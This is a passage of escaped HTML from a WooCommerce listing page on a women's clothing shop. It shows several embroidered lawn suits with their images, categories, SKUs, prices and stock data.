href=\"https:\/\/pulkash.com\/product-category\/new-arrivals\/\" rel=\"tag\">NEW ARRIVALS<\/a>, <a href=\"https:\/\/pulkash.com\/product-category\/women\/stitched\/\" rel=\"tag\">STITCHED<\/a>, <a href=\"https:\/\/pulkash.com\/product-category\/women\/\" rel=\"tag\">Women<\/a><\/span>\n\t\t\t<a class=\"product-loop-title\" href=\"https:\/\/pulkash.com\/product\/mansha-digital-embroidered-luxury-lawn-with-heavy-embroidery-2\/\">\n\t<h3 class=\"woocommerce-loop-product__title\">MANSHA DIGITAL EMBROIDERED LUXURY LAWN WITH HEAVY EMBROIDERY<\/h3>\t<\/a>\n\t\n\t\t\n\t\t\n<form class=\"variations_form cart\" action=\"https:\/\/pulkash.com\/product\/mansha-digital-embroidered-luxury-lawn-with-heavy-embroidery-2\/\" method=\"post\" enctype='multipart\/form-data' data-product_id=\"601\" data-product_variations=\"[{"attributes":{"attribute_pa_size":""},"availability_html":"<p class=\\"stock in-stock\\">In stock<\\\/p>\\n","backorders_allowed":false,"dimensions":{"length":"","width":"","height":""},"dimensions_html":"N\\\/A","display_price":34.99,"display_regular_price":34.99,"image":{"title":"black-ora-600x900_3_11zon","caption":"","url":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/black-ora-600x900_3_11zon.jpeg","alt":"","src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/black-ora-600x900_3_11zon.jpeg","srcset":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/black-ora-600x900_3_11zon.jpeg 600w, https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/black-ora-600x900_3_11zon-400x600.jpeg 400w","sizes":"(max-width: 600px) 100vw, 600px","full_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/black-ora-600x900_3_11zon.jpeg","full_src_w":600,"full_src_h":900,"gallery_thumbnail_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/black-ora-600x900_3_11zon-150x150.jpeg","gallery_thumbnail_src_w":150,"gallery_thumbnail_src_h":150,"thumb_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/black-ora-600x900_3_11zon.jpeg","thumb_src_w":600,"thumb_src_h":900,"src_w":600,"src_h":900},"image_id":948,"is_downloadable":false,"is_in_stock":true,"is_purchasable":true,"is_sold_individually":"no","is_virtual":false,"max_qty":10,"min_qty":1,"price_html":"","sku":"MAN-CH1-02","variation_description":"","variation_id":604,"variation_is_active":true,"variation_is_visible":true,"weight":"","weight_html":"N\\\/A","image_thumb":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/black-ora-600x900_3_11zon-150x150.jpeg","image_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/black-ora-600x900_3_11zon.jpeg","image_link":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/black-ora-600x900_3_11zon.jpeg"}]\">\n\t\n\t\t\t<table class=\"variations\" cellspacing=\"0\">\n\t\t\t<tbody>\n\t\t\t\t\t\t\t<\/tbody>\n\t\t<\/table>\n\t\t\n\t\t\n\t\n\t<\/form>\n\n\t<\/div>\n<\/div>\n<\/li>\n\n<li class=\"product-col product-outimage_aq_onimage product type-product post-606 status-publish instock product_cat-mansha product_cat-new-arrivals product_cat-stitched product_cat-women has-post-thumbnail shipping-taxable purchasable product-type-variable\">\n<div class=\"product-inner\">\n\t\n\t<div class=\"product-image\">\n\n\t\t<a href=\"https:\/\/pulkash.com\/product\/mansha-digital-embroidered-luxury-lawn-with-heavy-embroidery-3\/\">\n\t\t\t<div class=\"inner img-effect\"><img width=\"600\" height=\"900\" src=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/brown-34.99--600x900.jpeg\" class=\" wp-post-image\" alt=\"\" loading=\"lazy\" srcset=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/brown-34.99--600x900.jpeg 600w, https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/brown-34.99--400x600.jpeg 400w\" sizes=\"(max-width: 600px) 100vw, 600px\" \/><img width=\"600\" height=\"900\" src=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/brown-2-600x900.jpeg\" class=\"hover-image\" alt=\"\" loading=\"lazy\" srcset=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/brown-2-600x900.jpeg 600w, https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/brown-2-400x600.jpeg 400w\" sizes=\"(max-width: 600px) 100vw, 600px\" \/><\/div>\t\t<\/a>\n\t\t\t<div class=\"links-on-image\">\n\t\t\t<div class=\"add-links-wrap\">\n\t<div class=\"add-links no-effect clearfix\">\n\t\t<a href=\"https:\/\/pulkash.com\/product\/mansha-digital-embroidered-luxury-lawn-with-heavy-embroidery-3\/\" data-quantity=\"1\" class=\"viewcart-style-2 button product_type_variable add_to_cart_button\" data-product_id=\"606\" data-product_sku=\"MAN-CH1-03\" aria-label=\"Select options for “MANSHA DIGITAL EMBROIDERED LUXURY LAWN WITH HEAVY EMBROIDERY”\" rel=\"nofollow\">Select options<\/a>\t<\/div>\n\t<\/div>\n\t\t<\/div>\n\t\t\t<\/div>\n\n\t<div class=\"product-content\">\n\t\t<span class=\"category-list\"><a href=\"https:\/\/pulkash.com\/product-category\/women\/stitched\/mansha\/\" rel=\"tag\">MANSHA<\/a>, <a href=\"https:\/\/pulkash.com\/product-category\/new-arrivals\/\" rel=\"tag\">NEW ARRIVALS<\/a>, <a href=\"https:\/\/pulkash.com\/product-category\/women\/stitched\/\" rel=\"tag\">STITCHED<\/a>, <a href=\"https:\/\/pulkash.com\/product-category\/women\/\" rel=\"tag\">Women<\/a><\/span>\n\t\t\t<a class=\"product-loop-title\" href=\"https:\/\/pulkash.com\/product\/mansha-digital-embroidered-luxury-lawn-with-heavy-embroidery-3\/\">\n\t<h3 class=\"woocommerce-loop-product__title\">MANSHA DIGITAL EMBROIDERED LUXURY LAWN WITH HEAVY EMBROIDERY<\/h3>\t<\/a>\n\t\n\t\t\n\t\t\n<form class=\"variations_form cart\" action=\"https:\/\/pulkash.com\/product\/mansha-digital-embroidered-luxury-lawn-with-heavy-embroidery-3\/\" method=\"post\" enctype='multipart\/form-data' data-product_id=\"606\" data-product_variations=\"[{"attributes":{"attribute_pa_size":""},"availability_html":"<p class=\\"stock in-stock\\">In stock<\\\/p>\\n","backorders_allowed":false,"dimensions":{"length":"","width":"","height":""},"dimensions_html":"N\\\/A","display_price":34.99,"display_regular_price":34.99,"image":{"title":"brown 34.99","caption":"","url":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/brown-34.99-.jpeg","alt":"","src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/brown-34.99--600x900.jpeg","srcset":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/brown-34.99--600x900.jpeg 600w, https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/brown-34.99--400x600.jpeg 400w","sizes":"(max-width: 600px) 100vw, 600px","full_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/brown-34.99-.jpeg","full_src_w":700,"full_src_h":1050,"gallery_thumbnail_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/brown-34.99--150x150.jpeg","gallery_thumbnail_src_w":150,"gallery_thumbnail_src_h":150,"thumb_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/brown-34.99--600x900.jpeg","thumb_src_w":600,"thumb_src_h":900,"src_w":600,"src_h":900},"image_id":582,"is_downloadable":false,"is_in_stock":true,"is_purchasable":true,"is_sold_individually":"no","is_virtual":false,"max_qty":12,"min_qty":1,"price_html":"","sku":"MAN-CH1-03","variation_description":"","variation_id":607,"variation_is_active":true,"variation_is_visible":true,"weight":"","weight_html":"N\\\/A","image_thumb":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/brown-34.99--150x150.jpeg","image_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/brown-34.99--600x900.jpeg","image_link":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/brown-34.99-.jpeg"}]\">\n\t\n\t\t\t<table class=\"variations\" cellspacing=\"0\">\n\t\t\t<tbody>\n\t\t\t\t\t\t\t<\/tbody>\n\t\t<\/table>\n\t\t\n\t\t\n\t\n\t<\/form>\n\n\t<\/div>\n<\/div>\n<\/li>\n\n<li class=\"product-col product-outimage_aq_onimage product type-product post-608 status-publish last instock product_cat-mansha product_cat-new-arrivals product_cat-stitched product_cat-women has-post-thumbnail shipping-taxable purchasable product-type-variable\">\n<div class=\"product-inner\">\n\t\n\t<div class=\"product-image\">\n\n\t\t<a href=\"https:\/\/pulkash.com\/product\/mansha-digital-embroidered-luxury-lawn-with-heavy-embroidery-4\/\">\n\t\t\t<div class=\"inner img-effect\"><img width=\"600\" height=\"900\" src=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/blue1-34.99-600x900.jpeg\" class=\" wp-post-image\" alt=\"\" loading=\"lazy\" srcset=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/blue1-34.99-600x900.jpeg 600w, https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/blue1-34.99-400x600.jpeg 400w\" sizes=\"(max-width: 600px) 100vw, 600px\" \/><img width=\"600\" height=\"900\" src=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/blue2-600x900.jpeg\" class=\"hover-image\" alt=\"\" loading=\"lazy\" srcset=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/blue2-600x900.jpeg 600w, https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/blue2-400x600.jpeg 400w\" sizes=\"(max-width: 600px) 100vw, 600px\" \/><\/div>\t\t<\/a>\n\t\t\t<div class=\"links-on-image\">\n\t\t\t<div class=\"add-links-wrap\">\n\t<div class=\"add-links no-effect clearfix\">\n\t\t<a href=\"https:\/\/pulkash.com\/product\/mansha-digital-embroidered-luxury-lawn-with-heavy-embroidery-4\/\" data-quantity=\"1\" class=\"viewcart-style-2 button product_type_variable add_to_cart_button\" data-product_id=\"608\" data-product_sku=\"MAN-CH1-04\" aria-label=\"Select options for “MANSHA DIGITAL EMBROIDERED LUXURY LAWN WITH HEAVY EMBROIDERY”\" rel=\"nofollow\">Select options<\/a>\t<\/div>\n\t<\/div>\n\t\t<\/div>\n\t\t\t<\/div>\n\n\t<div class=\"product-content\">\n\t\t<span class=\"category-list\"><a href=\"https:\/\/pulkash.com\/product-category\/women\/stitched\/mansha\/\" rel=\"tag\">MANSHA<\/a>, <a href=\"https:\/\/pulkash.com\/product-category\/new-arrivals\/\" rel=\"tag\">NEW ARRIVALS<\/a>, <a href=\"https:\/\/pulkash.com\/product-category\/women\/stitched\/\" rel=\"tag\">STITCHED<\/a>, <a href=\"https:\/\/pulkash.com\/product-category\/women\/\" rel=\"tag\">Women<\/a><\/span>\n\t\t\t<a class=\"product-loop-title\" href=\"https:\/\/pulkash.com\/product\/mansha-digital-embroidered-luxury-lawn-with-heavy-embroidery-4\/\">\n\t<h3 class=\"woocommerce-loop-product__title\">MANSHA DIGITAL EMBROIDERED LUXURY LAWN WITH HEAVY EMBROIDERY<\/h3>\t<\/a>\n\t\n\t\t\n\t\t\n<form class=\"variations_form cart\" action=\"https:\/\/pulkash.com\/product\/mansha-digital-embroidered-luxury-lawn-with-heavy-embroidery-4\/\" method=\"post\" enctype='multipart\/form-data' data-product_id=\"608\" data-product_variations=\"[{"attributes":{"attribute_pa_size":""},"availability_html":"<p class=\\"stock in-stock\\">In stock<\\\/p>\\n","backorders_allowed":false,"dimensions":{"length":"","width":"","height":""},"dimensions_html":"N\\\/A","display_price":34.99,"display_regular_price":34.99,"image":{"title":"blue1 34.99","caption":"","url":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/blue1-34.99.jpeg","alt":"","src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/blue1-34.99-600x900.jpeg","srcset":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/blue1-34.99-600x900.jpeg 600w, https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/blue1-34.99-400x600.jpeg 400w","sizes":"(max-width: 600px) 100vw, 600px","full_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/blue1-34.99.jpeg","full_src_w":700,"full_src_h":1050,"gallery_thumbnail_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/blue1-34.99-150x150.jpeg","gallery_thumbnail_src_w":150,"gallery_thumbnail_src_h":150,"thumb_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/blue1-34.99-600x900.jpeg","thumb_src_w":600,"thumb_src_h":900,"src_w":600,"src_h":900},"image_id":577,"is_downloadable":false,"is_in_stock":true,"is_purchasable":true,"is_sold_individually":"no","is_virtual":false,"max_qty":12,"min_qty":1,"price_html":"","sku":"MAN-CH1-04","variation_description":"","variation_id":609,"variation_is_active":true,"variation_is_visible":true,"weight":"","weight_html":"N\\\/A","image_thumb":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/blue1-34.99-150x150.jpeg","image_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/blue1-34.99-600x900.jpeg","image_link":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/blue1-34.99.jpeg"}]\">\n\t\n\t\t\t<table class=\"variations\" cellspacing=\"0\">\n\t\t\t<tbody>\n\t\t\t\t\t\t\t<\/tbody>\n\t\t<\/table>\n\t\t\n\t\t\n\t\n\t<\/form>\n\n\t<\/div>\n<\/div>\n<\/li>\n\n<li class=\"product-col product-outimage_aq_onimage product type-product post-610 status-publish first instock product_cat-mansha product_cat-new-arrivals product_cat-stitched product_cat-women has-post-thumbnail shipping-taxable purchasable product-type-variable\">\n<div class=\"product-inner\">\n\t\n\t<div class=\"product-image\">\n\n\t\t<a href=\"https:\/\/pulkash.com\/product\/mansha-digital-embroidered-luxury-lawn-with-heavy-embroidery-5\/\">\n\t\t\t<div class=\"inner img-effect\"><img width=\"600\" height=\"900\" src=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/stone-blue-600x900.jpeg\" class=\" wp-post-image\" alt=\"\" loading=\"lazy\" srcset=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/stone-blue-600x900.jpeg 600w, https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/stone-blue-400x600.jpeg 400w\" sizes=\"(max-width: 600px) 100vw, 600px\" \/><img width=\"600\" height=\"900\" src=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/stoneblue-34.99-600x900.jpeg\" class=\"hover-image\" alt=\"\" loading=\"lazy\" srcset=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/stoneblue-34.99-600x900.jpeg 600w, https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/stoneblue-34.99-400x600.jpeg 400w\" sizes=\"(max-width: 600px) 100vw, 600px\" \/><\/div>\t\t<\/a>\n\t\t\t<div class=\"links-on-image\">\n\t\t\t<div class=\"add-links-wrap\">\n\t<div class=\"add-links no-effect clearfix\">\n\t\t<a href=\"https:\/\/pulkash.com\/product\/mansha-digital-embroidered-luxury-lawn-with-heavy-embroidery-5\/\" data-quantity=\"1\" class=\"viewcart-style-2 button product_type_variable add_to_cart_button\" data-product_id=\"610\" data-product_sku=\"MAN-CH1-05\" aria-label=\"Select options for “MANSHA DIGITAL EMBROIDERED LUXURY LAWN WITH HEAVY EMBROIDERY”\" rel=\"nofollow\">Select options<\/a>\t<\/div>\n\t<\/div>\n\t\t<\/div>\n\t\t\t<\/div>\n\n\t<div class=\"product-content\">\n\t\t<span class=\"category-list\"><a href=\"https:\/\/pulkash.com\/product-category\/women\/stitched\/mansha\/\" rel=\"tag\">MANSHA<\/a>, <a href=\"https:\/\/pulkash.com\/product-category\/new-arrivals\/\" rel=\"tag\">NEW ARRIVALS<\/a>, <a href=\"https:\/\/pulkash.com\/product-category\/women\/stitched\/\" rel=\"tag\">STITCHED<\/a>, <a href=\"https:\/\/pulkash.com\/product-category\/women\/\" rel=\"tag\">Women<\/a><\/span>\n\t\t\t<a class=\"product-loop-title\" href=\"https:\/\/pulkash.com\/product\/mansha-digital-embroidered-luxury-lawn-with-heavy-embroidery-5\/\">\n\t<h3 class=\"woocommerce-loop-product__title\">MANSHA DIGITAL EMBROIDERED LUXURY LAWN WITH HEAVY EMBROIDERY<\/h3>\t<\/a>\n\t\n\t\t\n\t\t\n<form class=\"variations_form cart\" action=\"https:\/\/pulkash.com\/product\/mansha-digital-embroidered-luxury-lawn-with-heavy-embroidery-5\/\" method=\"post\" enctype='multipart\/form-data' data-product_id=\"610\" data-product_variations=\"[{"attributes":{"attribute_pa_size":""},"availability_html":"<p class=\\"stock in-stock\\">In stock<\\\/p>\\n","backorders_allowed":false,"dimensions":{"length":"","width":"","height":""},"dimensions_html":"N\\\/A","display_price":34.99,"display_regular_price":34.99,"image":{"title":"stone blue","caption":"","url":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/stone-blue.jpeg","alt":"","src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/stone-blue-600x900.jpeg","srcset":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/stone-blue-600x900.jpeg 600w, https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/stone-blue-400x600.jpeg 400w","sizes":"(max-width: 600px) 100vw, 600px","full_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/stone-blue.jpeg","full_src_w":700,"full_src_h":1050,"gallery_thumbnail_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/stone-blue-150x150.jpeg","gallery_thumbnail_src_w":150,"gallery_thumbnail_src_h":150,"thumb_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/stone-blue-600x900.jpeg","thumb_src_w":600,"thumb_src_h":900,"src_w":600,"src_h":900},"image_id":599,"is_downloadable":false,"is_in_stock":true,"is_purchasable":true,"is_sold_individually":"no","is_virtual":false,"max_qty":12,"min_qty":1,"price_html":"","sku":"MAN-CH1-05","variation_description":"","variation_id":611,"variation_is_active":true,"variation_is_visible":true,"weight":"","weight_html":"N\\\/A","image_thumb":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/stone-blue-150x150.jpeg","image_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/stone-blue-600x900.jpeg","image_link":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/stone-blue.jpeg"}]\">\n\t\n\t\t\t<table class=\"variations\" cellspacing=\"0\">\n\t\t\t<tbody>\n\t\t\t\t\t\t\t<\/tbody>\n\t\t<\/table>\n\t\t\n\t\t\n\t\n\t<\/form>\n\n\t<\/div>\n<\/div>\n<\/li>\n\n<li class=\"product-col product-outimage_aq_onimage product type-product post-612 status-publish instock product_cat-mansha product_cat-new-arrivals product_cat-stitched product_cat-women has-post-thumbnail shipping-taxable purchasable product-type-variable\">\n<div class=\"product-inner\">\n\t\n\t<div class=\"product-image\">\n\n\t\t<a href=\"https:\/\/pulkash.com\/product\/mansha-digital-embroidered-luxury-lawn-with-heavy-embroidery-6\/\">\n\t\t\t<div class=\"inner img-effect\"><img width=\"600\" height=\"900\" src=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/grey-34.99-600x900.jpeg\" class=\" wp-post-image\" alt=\"\" loading=\"lazy\" srcset=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/grey-34.99-600x900.jpeg 600w, https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/grey-34.99-400x600.jpeg 400w\" sizes=\"(max-width: 600px) 100vw, 600px\" \/><img width=\"600\" height=\"900\" src=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/grey34.99-600x900.jpeg\" class=\"hover-image\" alt=\"\" loading=\"lazy\" srcset=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/grey34.99-600x900.jpeg 600w, https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/grey34.99-400x600.jpeg 400w\" sizes=\"(max-width: 600px) 100vw, 600px\" \/><\/div>\t\t<\/a>\n\t\t\t<div class=\"links-on-image\">\n\t\t\t<div class=\"add-links-wrap\">\n\t<div class=\"add-links no-effect clearfix\">\n\t\t<a href=\"https:\/\/pulkash.com\/product\/mansha-digital-embroidered-luxury-lawn-with-heavy-embroidery-6\/\" data-quantity=\"1\" class=\"viewcart-style-2 button product_type_variable add_to_cart_button\" data-product_id=\"612\" data-product_sku=\"MAN-CH1-06\" aria-label=\"Select options for “MANSHA DIGITAL EMBROIDERED LUXURY LAWN WITH HEAVY EMBROIDERY”\" rel=\"nofollow\">Select options<\/a>\t<\/div>\n\t<\/div>\n\t\t<\/div>\n\t\t\t<\/div>\n\n\t<div class=\"product-content\">\n\t\t<span class=\"category-list\"><a href=\"https:\/\/pulkash.com\/product-category\/women\/stitched\/mansha\/\" rel=\"tag\">MANSHA<\/a>, <a href=\"https:\/\/pulkash.com\/product-category\/new-arrivals\/\" rel=\"tag\">NEW ARRIVALS<\/a>, <a href=\"https:\/\/pulkash.com\/product-category\/women\/stitched\/\" rel=\"tag\">STITCHED<\/a>, <a href=\"https:\/\/pulkash.com\/product-category\/women\/\" rel=\"tag\">Women<\/a><\/span>\n\t\t\t<a class=\"product-loop-title\" href=\"https:\/\/pulkash.com\/product\/mansha-digital-embroidered-luxury-lawn-with-heavy-embroidery-6\/\">\n\t<h3 class=\"woocommerce-loop-product__title\">MANSHA DIGITAL EMBROIDERED LUXURY LAWN WITH HEAVY EMBROIDERY<\/h3>\t<\/a>\n\t\n\t\t\n\t\t\n<form class=\"variations_form cart\" action=\"https:\/\/pulkash.com\/product\/mansha-digital-embroidered-luxury-lawn-with-heavy-embroidery-6\/\" method=\"post\" enctype='multipart\/form-data' data-product_id=\"612\" data-product_variations=\"[{"attributes":{"attribute_pa_size":""},"availability_html":"<p class=\\"stock in-stock\\">In stock<\\\/p>\\n","backorders_allowed":false,"dimensions":{"length":"","width":"","height":""},"dimensions_html":"N\\\/A","display_price":34.99,"display_regular_price":34.99,"image":{"title":"grey 34.99","caption":"","url":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/grey-34.99.jpeg","alt":"","src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/grey-34.99-600x900.jpeg","srcset":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/grey-34.99-600x900.jpeg 600w, https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/grey-34.99-400x600.jpeg 400w","sizes":"(max-width: 600px) 100vw, 600px","full_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/grey-34.99.jpeg","full_src_w":700,"full_src_h":1050,"gallery_thumbnail_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/grey-34.99-150x150.jpeg","gallery_thumbnail_src_w":150,"gallery_thumbnail_src_h":150,"thumb_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/grey-34.99-600x900.jpeg","thumb_src_w":600,"thumb_src_h":900,"src_w":600,"src_h":900},"image_id":586,"is_downloadable":false,"is_in_stock":true,"is_purchasable":true,"is_sold_individually":"no","is_virtual":false,"max_qty":12,"min_qty":1,"price_html":"","sku":"MAN-CH1-06","variation_description":"","variation_id":613,"variation_is_active":true,"variation_is_visible":true,"weight":"","weight_html":"N\\\/A","image_thumb":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/grey-34.99-150x150.jpeg","image_src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/grey-34.99-600x900.jpeg","image_link":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/grey-34.99.jpeg"}]\">\n\t\n\t\t\t<table class=\"variations\" cellspacing=\"0\">\n\t\t\t<tbody>\n\t\t\t\t\t\t\t<\/tbody>\n\t\t<\/table>\n\t\t\n\t\t\n\t\n\t<\/form>\n\n\t<\/div>\n<\/div>\n<\/li>\n\n<li class=\"product-col product-outimage_aq_onimage product type-product post-614 status-publish instock product_cat-mansha product_cat-new-arrivals product_cat-stitched product_cat-women has-post-thumbnail shipping-taxable purchasable product-type-variable\">\n<div class=\"product-inner\">\n\t\n\t<div class=\"product-image\">\n\n\t\t<a href=\"https:\/\/pulkash.com\/product\/mansha-digital-embroidered-luxury-lawn-with-heavy-embroidery-7\/\">\n\t\t\t<div class=\"inner img-effect\"><img width=\"600\" height=\"900\" src=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/light-blue-25.99-600x900.jpeg\" class=\" wp-post-image\" alt=\"\" loading=\"lazy\" srcset=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/light-blue-25.99-600x900.jpeg 600w, https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/light-blue-25.99-400x600.jpeg 400w\" sizes=\"(max-width: 600px) 100vw, 600px\" \/><img width=\"600\" height=\"900\" src=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/lightblue25.99-600x900.jpeg\" class=\"hover-image\" alt=\"\" loading=\"lazy\" srcset=\"https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/lightblue25.99-600x900.jpeg 600w, https:\/\/pulkash.com\/wp-content\/uploads\/2022\/04\/lightblue25.99-400x600.jpeg 400w\" sizes=\"(max-width: 600px) 100vw, 600px\" \/><\/div>\t\t<\/a>\n\t\t\t<div class=\"links-on-image\">\n\t\t\t<div class=\"add-links-wrap\">\n\t<div class=\"add-links no-effect clearfix\">\n\t\t<a href=\"https:\/\/pulkash.com\/product\/mansha-digital-embroidered-luxury-lawn-with-heavy-embroidery-7\/\" data-quantity=\"1\" class=\"viewcart-style-2 button product_type_variable add_to_cart_button\" data-product_id=\"614\" data-product_sku=\"MAN-CH1-07\" aria-label=\"Select options for “MANSHA DIGITAL EMBROIDERED LUXURY LAWN WITH HEAVY EMBROIDERY”\" rel=\"nofollow\">Select options<\/a>\t<\/div>\n\t<\/div>\n\t\t<\/div>\n\t\t\t<\/div>\n\n\t<div class=\"product-content\">\n\t\t<span class=\"category-list\"><a href=\"https:\/\/pulkash.com\/product-category\/women\/stitched\/mansha\/\" rel=\"tag\">MANSHA<\/a>, <a href=\"https:\/\/pulkash.com\/product-category\/new-arrivals\/\" rel=\"tag\">NEW ARRIVALS<\/a>, <a href=\"https:\/\/pulkash.com\/product-category\/women\/stitched\/\" rel=\"tag\">STITCHED<\/a>, <a href=\"https:\/\/pulkash.com\/product-category\/women\/\" rel=\"tag\">Women<\/a><\/span>\n\t\t\t<a class=\"product-loop-title\" href=\"https:\/\/pulkash.com\/product\/mansha-digital-embroidered-luxury-lawn-with-heavy-embroidery-7\/\">\n\t<h3 class=\"woocommerce-loop-product__title\">MANSHA DIGITAL EMBROIDERED LUXURY LAWN WITH HEAVY EMBROIDERY<\/h3>\t<\/a>\n\t\n\t\t\n\t\t\n<form class=\"variations_form cart\" action=\"https:\/\/pulkash.com\/product\/mansha-digital-embroidered-luxury-lawn-with-heavy-embroidery-7\/\" method=\"post\" enctype='multipart\/form-data' data-product_id=\"614\" data-product_variations=\"[{"attributes":{"attribute_pa_size":""},"availability_html":"<p class=\\"stock in-stock\\">In stock<\\\/p>\\n","backorders_allowed":false,"dimensions":{"length":"","width":"","height":""},"dimensions_html":"N\\\/A","display_price":34.99,"display_regular_price":34.99,"image":{"title":"light blue 25.99","caption":"","url":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/light-blue-25.99.jpeg","alt":"","src":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/light-blue-25.99-600x900.jpeg","srcset":"https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/light-blue-25.99-600x900.jpeg 600w, https:\\\/\\\/pulkash.com\\\/wp-content\\\/uploads\\\/2022\\\/04\\\/light-blue-25.99-400x600.jpeg 400w","sizes":"(max-width: 600px) 100vw, 